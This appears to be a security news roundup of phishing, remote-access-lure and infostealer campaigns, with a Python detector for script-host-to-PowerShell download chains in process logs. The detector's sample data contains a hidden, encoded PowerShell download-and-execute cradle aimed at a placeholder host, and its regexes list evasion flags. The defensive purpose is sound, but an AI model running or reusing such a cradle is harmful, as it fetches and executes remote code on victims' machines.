Both campaigns involved the distribution of malicious emails purporting to be invoices, purchase orders, or quotation requests. Each carries an attachment that, when opened, triggers a PowerShell script that fetches the trojanized image and executes a .NET-based loader to launch the payloads.
Malicious emails spoofing WordPress, Shopify, and other widely used platforms, disguised as account confirmation or subscription notices, lure targets into installing AnyDesk, TeamViewer, or other remote access software, which gives the attackers interactive access to the system for malware deployment and data exfiltration.
Attacks in the campaign delivered phishing emails purporting to be freight invoices from DHL Express. Each carried a ZIP archive containing a JavaScript file that in turn ran a PowerShell script communicating with the attacker-controlled command-and-control server, according to an analysis from Infoblox.
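The chain in the two briefs above (a script attachment that launches PowerShell, which then pulls a remote file, an image in the first case) is visible in process-creation telemetry regardless of the lure. The following detector is an added example written for this page; it is not code from Infoblox or from either campaign's analysis. It assumes Sysmon Event ID 1-style fields (pid, ppid, image path, command line), assumes the .js attachment runs under Windows Script Host (wscript.exe/cscript.exe), and runs over constructed sample events, not real logs. It decodes a -EncodedCommand argument, extracts URLs, and flags downloads of image files so an analyst can check them for an embedded payload.

```python
"""Added example: flag the attachment -> script host -> PowerShell -> download chain
in process-creation telemetry. Field names mimic Sysmon Event ID 1; the records
below are constructed for this example, not real logs."""
import base64
import re
from dataclasses import dataclass, field


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


@dataclass
class Finding:
    parent: ProcEvent
    child: ProcEvent
    urls: list = field(default_factory=list)
    reasons: list = field(default_factory=list)


# Assumption: a double-clicked .js attachment runs under Windows Script Host.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Script file in a temp/download/archive-extraction path, as an opened attachment would be.
ATTACHMENT_PATH = re.compile(r"\\(?:temp|downloads)\\[^\s\"]*\.(?:js|jse|vbs|wsf)\b", re.I)
# Common download-cradle and evasion tokens in PowerShell command lines.
CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"frombase64string|reflection\.assembly|-w(?:indowstyle)?\s+hidden|-nop\b)", re.I)
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
IMAGE_URL = re.compile(r"\.(?:png|jpg|jpeg|gif|bmp)(?:[?#]|$)", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Return one Finding per PowerShell process whose parent is a script host."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for child in events:
        if basename(child.image) not in POWERSHELL:
            continue
        parent = by_pid.get(child.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue
        reasons = [f"{basename(parent.image)} spawned {basename(child.image)}"]
        if ATTACHMENT_PATH.search(parent.cmdline):
            reasons.append("script ran from a temp/download path")
        text = child.cmdline
        decoded = decode_encoded_command(child.cmdline)
        if decoded is not None:
            reasons.append("-EncodedCommand decoded")
            text += " " + decoded          # scan the flags and the decoded body together
        for tok in dict.fromkeys(m.group(0).lower() for m in CRADLE.finditer(text)):
            reasons.append("cradle/evasion token: " + tok)
        urls = URL.findall(text)
        for u in urls:
            if IMAGE_URL.search(u):
                reasons.append("downloads an image; inspect it for an appended payload: " + u)
        findings.append(Finding(parent, child, urls, reasons))
    return findings


def _enc(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: one malicious chain plus two benign processes (hypothetical paths/hosts).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\Temp1_DHL_Invoice.zip\DHL_Invoice.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc " + _enc(
                  "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/cat.png')")),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\backup.ps1"),    # benign: parent is explorer
    ProcEvent(500, 100, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Scripts\logon.vbs"'),             # benign: spawns nothing
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.child.pid} (parent {f.parent.pid}):")
        for r in f.reasons:
            print("  -", r)
```

The parent/child pairing is the durable signal; the token list only adds context and should be tuned per environment, since legitimate logon scripts also run under wscript.exe (the benign event above produces no finding because it spawns no PowerShell).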
Threat actors posing as recruiters on LinkedIn send targeted software developers project tests and code reviews that lead to malicious GitLab repositories, which distribute modular information-stealing malware for Windows, macOS, and Linux, a report from SecurityScorecard showed.
The intrusion into Telefónica's Jira platform began with credentials stolen by infostealer malware from more than a dozen of the firm's employees, continued with the targeting of employees holding admin privileges, and ended with the exfiltration of a list of 24,000 Telefónica employee names and email addresses, 5,000 internal files, and about 500,000 internal Jira issue summaries.